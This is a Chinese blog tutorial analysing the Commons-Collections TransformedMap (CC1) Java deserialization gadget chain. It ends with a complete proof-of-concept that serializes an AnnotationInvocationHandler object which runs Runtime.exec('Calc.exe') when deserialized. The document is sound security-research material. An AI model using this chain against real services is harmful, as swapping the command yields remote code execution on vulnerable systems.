Apache commons-collections反序列化漏洞(TransformedMap利用链)

最新推荐文章于 2024-06-13 15:21:00 发布
最新推荐文章于 2024-06-13 15:21:00 发布
阅读量450 收藏
点赞数
分类专栏: java安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/115519583
版权

文章目录

Commons-collections概述

官网对Commons-collections的说明

Java commons-collections是JDK 1.2中的一个主要新增部分。它添加了许多强大的数据结构,可以加速大多数重要Java应用程序的开发。从那时起,它已经成为Java中公认的集合处理标准。

Commons-collection是一个基本的数据结构包,他封装拓展了Java基础Collection中的数据结构,而形成反序列化的数据结构是一个叫TransformedMap的一个Map结构的拓展。它实现了每次Map中元素发生改变时自动进行一些逻辑处理,而处理的逻辑由transformer函数定义,该函数在TransformedMap实例化时通过参数传入。

InvokerTransformer反射触发

Transform接口有三个实现类,最后的构造也是通过这些实现类来完成。首先来看下transform的一个重要实现类InvokerTransformer的部分代码

public class InvokerTransformer implements Transformer, Serializable {
    static final long serialVersionUID = -8653385846894047688L;
    private final String iMethodName;
    private final Class[] iParamTypes;
    private final Object[] iArgs;
    
    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        this.iMethodName = methodName;
        this.iParamTypes = paramTypes;
        this.iArgs = args;
    }
    
    public Object transform(Object input) {
        if (input == null) {
            return null;
        } else {
            try {
                Class cls = input.getClass();
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                return method.invoke(input, this.iArgs);
            } catch (NoSuchMethodException var5) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
            } catch (IllegalAccessException var6) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
            } catch (InvocationTargetException var7) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
            }
        }
    }
}

通过上述代码可以看出InvokerTransformer是Transformer的一个实现类,其构造方法中传入了三个可控参数分别为methodNameparamTypesargs分别对应了方法名,参数类型和参数,而重写的Transform方法为通过反射机制执行传入的函数以及参数。

由于我们最终的目的为执行任意函数,也就是执行Runtime.getRuntime().exec("Calc.exe")语句,那我们首先使用InvokerTransform来实现这一目标,后续再考虑如何触发的问题。

// 创建实例 传入构造方法参数 (函数名 参数类型 参数值)
InvokerTransformer invokerTransformer = new InvokerTransformer(
        "exec",
        new Class[]{String.class},
        new String[]{"Calc.exe"}
);
// 通过反射机制依次获得Runtime类 getRuntime构造方法 最后生成Runtime实例 
Object input = Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(Class.forName("java.lang.Runtime"));
// 执行transform函数
invokerTransformer.transform(input);

代码的内容为:

  • 创建InvokerTransformer实例并传入想要执行的函数名,参数类型和参数值
  • 通过反射机制得到Runtime实例作为transform函数的输入对象
  • 调用transform函数

发现可以成功弹出计算器
目前通过InvokerTransformer类已经可以实现反射执行命令的效果,不过需要两个前提条件,第一需要一个Runtime的实例作为input参数,第二需要主动调用transform函数,显然在服务端是不可能完成这两个条件的,所以接下来的问题就是如何自动传入构造的input并自动触发transform函数

ChainedTransformer遍历触发

同样先看下ChainedTransformer的主要代码

public class ChainedTransformer implements Transformer, Serializable {
    static final long serialVersionUID = 3514945074733160196L;
    private final Transformer[] iTransformers;
    public ChainedTransformer(Transformer[] transformers) {
        this.iTransformers = transformers;
    }

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

    public Transformer[] getTransformers() {
        return this.iTransformers;
    }
}

其中重写的transform方法为一个循环,遍历传入的transform数组,依次调用数组中每个元素的transform方法,并将每次调用返回的结果Object当作下次调用的输入。从这里就可以联想到上一个InvokerTransformer我们的需求之一就是自动传入构造的input,并自动触发。而ChainedTransformer刚好满足了这个需求。

接下来来构造ChainedTransformer的利用链。
这里利用链的构造用到了另外一个Transformer的实现类ConstantTransformer,不过这个实现类非常简单,简单来说就是实例化传入一个Object,transform函数会返回这个传入的Object。代码如下所示

public class ConstantTransformer implements Transformer, Serializable {
    static final long serialVersionUID = 6374440726369055124L;
    public static final Transformer NULL_INSTANCE = new ConstantTransformer((Object)null);
    private final Object iConstant;

    public static Transformer getInstance(Object constantToReturn) {
        return (Transformer)(constantToReturn == null ? NULL_INSTANCE : new ConstantTransformer(constantToReturn));
    }

    public ConstantTransformer(Object constantToReturn) {
        this.iConstant = constantToReturn;
    }

    public Object transform(Object input) {
        return this.iConstant;
    }

    public Object getConstant() {
        return this.iConstant;
    }
}

最终构造的利用链为:

Transformer[] transformers = new Transformer[]{
        // 获得Runtime类对象
        new ConstantTransformer(Runtime.class),
        // 传入Runtime类对象 反射执行getMethod获得getRuntime方法
        new InvokerTransformer(
                "getMethod",
                new Class[]{String.class,Class[].class},
                new Object[]{"getRuntime",new Class[0]}
                ),
        // 传入getRuntime方法 反射执行invoke方法 得到Runtime实例
        new InvokerTransformer("invoke",
                new Class[] {Object.class, Object[].class },
                new Object[] {null, null }
                ),
        // 传入Runtime实例 执行exec方法
        new InvokerTransformer("exec",
                new Class[] {String.class },
                new Object[] {"Calc.exe"})
};

此利用链所对应的反射语句为

((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("calc.exe");

此时的ChainTransformer为:

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
chainedTransformer.transform(null);

执行transform成功弹出计算器。
通过ChainedTransformer解决了InvokerTransformer构造input并输入的问题,现在服务端只需要触发transform方法即可

封装为TransformedMap

TransformedMap类实例化的过程中需要传入一个map和一个Transformer,每当TransformedMap中的元素产生变化时(添加,删除,修改)就会触发传入的Transformertransform方法。这样我们的触发条件就由服务端调用transform方法变为map中有元素发生改变。

public Object put(Object key, Object value) {
    key = this.transformKey(key);
    value = this.transformValue(value);
    return this.getMap().put(key, value);
}

可以看出每次调用put都会调用transformKeytransformValue

protected Object transformKey(Object object) {
    return this.keyTransformer == null ? object : this.keyTransformer.transform(object);
}

protected Object transformValue(Object object) {
    return this.valueTransformer == null ? object : this.valueTransformer.transform(object);
}

而这两个函数值valueTransformer,keyTransformer都是可控的

Transformer[] transformers = new Transformer[]{
        // 获得Runtime类对象
        new ConstantTransformer(Runtime.class),
        // 传入Runtime类对象 反射执行getMethod获得getRuntime方法
        new InvokerTransformer(
                "getMethod",
                new Class[]{String.class,Class[].class},
                new Object[]{"getRuntime",null}
        ),
        // 传入getRuntime方法对象 反射执行invoke方法 得到Runtime实例
        new InvokerTransformer("invoke",
                new Class[] {Object.class, Object[].class },
                new Object[] {null, null }
        ),
        // 传入Runtime实例 执行exec方法
        new InvokerTransformer("exec",
                new Class[] {String.class },
                new Object[] {"Calc.exe"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

Map innermap = new HashMap();
innermap.put("value","value");
Map outermap = TransformedMap.decorate(innermap,null,chainedTransformer);

经过TransformedMap封装后服务端触发条件从执行chainedTransformer的Transform方法变为对TransformedMap中key or value的修改

寻找ReadObject触发点

AnnotationInvocationHandler触发(JDK1.7)

在jdk1.7中AnnotationInvocationHandler类重写了ReadObject方法

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
    var1.defaultReadObject();
    AnnotationType var2 = null;

    try {
        var2 = AnnotationType.getInstance(this.type);
    } catch (IllegalArgumentException var9) {
        throw new InvalidObjectException("Non-annotation type in annotation serial stream");
    }

    Map var3 = var2.memberTypes();
    Iterator var4 = this.memberValues.entrySet().iterator();

    while(var4.hasNext()) {
        Entry var5 = (Entry)var4.next();
        String var6 = (String)var5.getKey();
        Class var7 = (Class)var3.get(var6);
        // 触发setValue函数
        if (var7 != null) {
            Object var8 = var5.getValue();
            if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
            }
        }
    }

其中遍历传入的Map,也就是上文构造的TransformedMap,然后执行setValue函数var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));成功触发恶意的transform函数。

完整的POC

public class poc {
    public static void main(String[] args) {
        try {
            Transformer[] transformers = new Transformer[]{
                    // 获得Runtime类对象
                    new ConstantTransformer(Runtime.class),
                    // 传入Runtime类对象 反射执行getMethod获得getRuntime方法
                    new InvokerTransformer(
                            "getMethod",
                            new Class[]{String.class,Class[].class},
                            new Object[]{"getRuntime",null}
                    ),
                    // 传入getRuntime方法对象 反射执行invoke方法 得到Runtime实例
                    new InvokerTransformer("invoke",
                            new Class[] {Object.class, Object[].class },
                            new Object[] {null, null }
                    ),
                    // 传入Runtime实例 执行exec方法
                    new InvokerTransformer("exec",
                            new Class[] {String.class },
                            new Object[] {"Calc.exe"})
            };

            ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

            Map innermap = new HashMap();
            innermap.put("value","value");
            Map outermap = TransformedMap.decorate(innermap,null,chainedTransformer);
			// 构造包含恶意map的AnnotationInvocationHandler对象
            Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
            Constructor cst = cl.getDeclaredConstructor(Class.class,Map.class);
            cst.setAccessible(true);
            Object exploitObj = cst.newInstance(Target.class,outermap);

            // 序列化
            FileOutputStream fos = new FileOutputStream("object");
            ObjectOutputStream oos = new ObjectOutputStream(fos);
            oos.writeObject(exploitObj);
            oos.close();

            // 反序列化
            FileInputStream fis = new FileInputStream("object");
            ObjectInputStream ois = new ObjectInputStream(fis);
            Object result = ois.readObject();
            ois.close();
            System.out.println(result);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

成功执行
在这里插入图片描述
JDK8后更改了AnnotationInvocationHandlerreadObject的写法,取消了setValue的使用,新建了LinkedHashMap来储存值。

kit_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
commons-collections4-4.1
11-01
总的来说,Apache Commons Collections 4.1是针对Java反序列化漏洞的重要更新,它提升了库的安全性,并可能包含其他改进。对于任何使用Apache Commons Collections的Java应用来说,升级到这个版本都是必要的,以保护...
Commons-Collections1反序列化
m0_62770485的博客
12-05 678
JAVA安全-Commons-Collections1反序列化
Javaweb安全——反序列化漏洞- CC1
weixin_43610673的博客
05-24 1191
Common-Collections利用1 第一次接触反序列化漏洞时写的初识Java反序列化漏洞这篇文章当中已经分析过一遍Common-Collections的两条子(分别用的TransformedMap和LazyMap构造恶意对象反射,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己写一遍exp加深印象。 本文环境为jd
Java工具库系列(十六):Apache Commons Collections
最新发布
阿里渣渣java研发组-群主
06-13 556
Apache Commons CollectionsApache Commons 项目的一部分,专注于提供增强的集合类和实用工具。新的集合类型(如BagMultiMapBidiMap高效的集合操作工具强大的集合装饰器Apache Commons Collections 是一个功能强大的工具库,通过提供丰富的集合类和实用方法,极大地简化了 Java 应用程序中的集合操作。在本篇文章中,我们介绍了 Commons Collections 的核心功能和使用方法。
Java 反序列化漏洞-Apache Commons Collections1-TransformedMap 攻击
cjdgg的博客
02-08 2469
Java 反序列化漏洞-Apache Commons Collections前言前置知识TransformedMap 前言 前面已经学了一些Java反序列化漏洞的相关基础知识,今天就来学习分析一下Apache Commons Collections反序列化漏洞 环境搭建推荐大家直接使用maven搭建,网上都有很多教程这里就不多说了 要寻找反序列化漏洞,最主要的是找到三个点: 入口点(kick-off),触发点(sink),调用(chain) 前置知识 TransformedMap org.apache.
java 反序列化CC1分析(TransformedMap)
wsitcj的博客
03-14 1405
Map类 --> TransformedMap Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。 TransformedMap.decorate方法
JAVA 反序列化Apache Commons Collections 反序列化漏洞分析
辛勤搬砖的门卫的专栏
03-01 1902
Apache Commons Collections 反序列化漏洞研究
commons-collections-3.2.2-
11-01
总的来说,Apache Commons Collections 3.2.2的更新对于任何使用WebLogic服务器和此库的项目来说都是至关重要的,因为它解决了可能导致严重安全风险的反序列化漏洞。通过正确地替换和配置,我们可以确保系统的稳定性...
Java反序列化漏洞利用工具的实现共5页.pdf.zip
11-23
例如,Apache Commons Collections库曾被发现存在一个著名的反序列化漏洞,攻击者可以通过构造特定的输入来执行任意代码。这种情况下,利用工具可以帮助复现攻击,以验证系统的脆弱性。 在实际应用中,防御Java...
commons-collections-3.2.2、4-4.1
11-07
修复weblogic反序列化漏洞,修复方法为:替换原来的common-collections组件,建议:原来是3.2.d就替换为3.2.2,原来是4.x,就替换为4.4.1,如果出现不兼容,则替换一个版本试试。 1.先停止weblogic 2.替换oracle\...
Java反序列化漏洞利用工具的实现.zip
10-16
本资料“Java反序列化漏洞利用工具的实现.zip”包含了一个PDF文档,很可能是详细介绍如何利用Java反序列化漏洞的教程。通常,这样的文档会涵盖以下几个关键知识点: 1. **Java序列化机制**:解释Java对象序列化的...
Apache-Commons-Collections漏洞问题
白话机器学习
08-15 1121
Apache-Commons-Collections这个框架,相信每一个Java程序员都不陌生,这是一个非常著名的开源框架。但是,他其实也曾经被爆出过序列化安全漏洞,可以被远程执行命令。
Apache Commons Collection3.2.1反序列化分析(CC1)
st3pby的博客
01-29 1625
Apache软件基金会的一个开源项目,它提供了一组可复用的数据结构和算法的实现,旨在扩展和增强Java集合框架,以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数据结构实现,以及许多实用程序类和算法实现。它的代码质量较高,被广泛应用于Java应用程序开发中。Commons Collections 3.1 版本的利用衍生出多个版本的利用方式,但其核心部分是相同的,不同之处在于中间过程的构造。
.exp文件_UEditor编辑器任意文件上传漏洞分析
weixin_39939510的博客
11-27 246
更多全球网络安全资讯尽在邑安全ue下载地址http://http://ueditor.baidu.com/website/download.htmlexp<form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" m...
【入坑JAVA安全】手把手教你写反序列化POC
一个安全研究员
04-15 1949
要是你是妹子就更好了~
transform TransformedMap利用
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
01-25 569
引入环境: <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dependency> <groupId>commons-collectio
commons-collections反序列化漏洞分析——远程代码执行
qq_45766062的博客
08-17 828
这里先说说java里面的命令执行。其实java的命令执行和PHP类似,PHP一般通过eval和system来执行系统命令。java则是通过来执行系统命令。
[Java安全]CommonCollections1_TransformedMap
cosmoslin的博客
03-08 672
CommonCollections1_TransformedMap 本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 3.1 import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.Const
java安全(八)TransformedMap构造POC
weixin_45694388的博客
07-31 1085
上一篇构造了一个了commons-collections的demo package test.org.vulhub.Ser; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; impo

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值